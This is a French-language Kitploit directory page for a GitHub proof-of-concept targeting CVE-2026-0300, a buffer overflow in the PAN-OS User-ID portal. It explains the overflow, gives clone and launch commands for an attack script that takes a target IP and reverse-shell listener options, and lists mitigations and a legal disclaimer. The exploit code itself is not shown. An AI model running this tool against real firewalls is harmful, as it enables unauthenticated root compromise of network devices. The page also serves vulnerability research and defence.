Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-0300-POC — Preuve de concept pour CVE-2026-0300, un débordement de tampon critique dans le portail User-ID de PAN-OS permettant l'exécution de code à distance non authentifiée avec les privilèges root. | Kitploit
Outils/GitHubGitHub/p3nt3st3r-star/cve-2026-0300-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubp3nt3st3r-star/cve-2026-0300-poc

CVE-2026-0300-POC

Preuve de concept pour CVE-2026-0300, un débordement de tampon critique dans le portail User-ID de PAN-OS permettant l'exécution de code à distance non authentifiée avec les privilèges root.

Voir le dépôt
21105il y a 4 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️ CVE-2026-0300 : Analyse RCE du portail User-ID™ PAN-OS

Preuve de concept de recherche : CWE-787 Écriture hors limites

Security Python License Dependencies

📌 Vue d'ensemble

CVE-2026-0300 est une vulnérabilité de dépassement de tampon de haute sévérité identifiée dans le portail d'authentification User-ID™ (portail captif) de Palo Alto Networks PAN-OS. Ce dépôt de recherche démontre la logique technique de la vulnérabilité, en se concentrant spécifiquement sur la manière dont un paquet réseau non authentifié peut conduire à une exécution de code à distance (RCE) avec les privilèges root.


📊 Répartition de la vulnérabilité

CaractéristiqueDétails
ID CVECVE-2026-0300
Score de sévérité9.3 (Critique)
Type de faiblesseCWE-787 : Écriture hors limites
Vecteur d'attaqueRéseau (non authentifié)
Privilèges requisAucun
Interaction utilisateurAucune
Logiciel concernéPAN-OS 12.1, 11.2, 11.1, 10.2

🔬 Mécanisme technique

La vulnérabilité se produit lorsque le service du portail d'authentification User-ID ne parvient pas à valider la longueur des données entrantes avant de les écrire dans un tampon mémoire.

  1. Le tampon : Le service alloue une zone mémoire de taille fixe pour traiter les requêtes du portail.
  2. Le dépassement : Une requête POST spécialement conçue envoie une charge utile dépassant cette taille.
  3. L'écrasement : Les données excédentaires écrasent la pile/tas, permettant à l'attaquant de contrôler le pointeur d'instruction (EIP/RIP) et d'exécuter un shellcode arbitraire.

🛠️ Installation et configuration

1. Prérequis

  • Python 3.9 ou supérieur.
  • Aucune bibliothèque externe requise (Utilise les modules standard socket, struct et argparse).

2. Clonage de l'outil de recherche

Cloner le dépôt

root@kitploit:~
git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git

Accéder au dossier

root@kitploit:~
cd CVE-2026-0300-POC

Rendre le script exécutable

root@kitploit:~
chmod +x research_poc.py

🚀 Guide d'utilisation

Cet outil est conçu avec une interface en ligne de commande (CLI) professionnelle.

Commande de base

root@kitploit:~
python3 research_poc.py -t <TARGET_IP> --lhost <LISTEN_IP> -L <LISTEN_PORT>

Paramètres avancés

OptionNomDescriptionDéfaut
-t--target(Obligatoire) Adresse IP cible du pare-feu.N/A
-p--portLe port exécutant le portail User-ID.6082
-o--offsetLa longueur en octets pour atteindre le point de dépassement mémoire.2048
-r--retL'adresse de retour hexadécimale.0xdeadbeef
-l--lhostAdresse IP du shell inverséVotre IP
-L--lportVotre port d'écoute4444

🛡️ Atténuation et sécurité

  • Mettre à jour PAN-OS : Installer les derniers correctifs de sécurité (publiés en mai 2026).
  • Restriction IP : Restreindre l'accès au portail aux zones IP internes de confiance.
  • Désactiver le portail : Si l'authentification User-ID n'est pas requise, désactiver la fonctionnalité.

⚠️ Avertissement éthique et légal

POUR LA RECHERCHE ÉDUCATIVE ET AUTORISÉE UNIQUEMENT. Les tests non autorisés contre des systèmes que vous ne possédez pas sont illégaux. L'auteur n'est pas responsable de toute utilisation abusive de ce code de recherche. Utilisez-le de manière responsable pour améliorer la sécurité mondiale. Développé par : https://t.me/p3Nt3st3rsTAr Date de découverte de la vulnérabilité : 07 mai 2026

Télécharger l’outil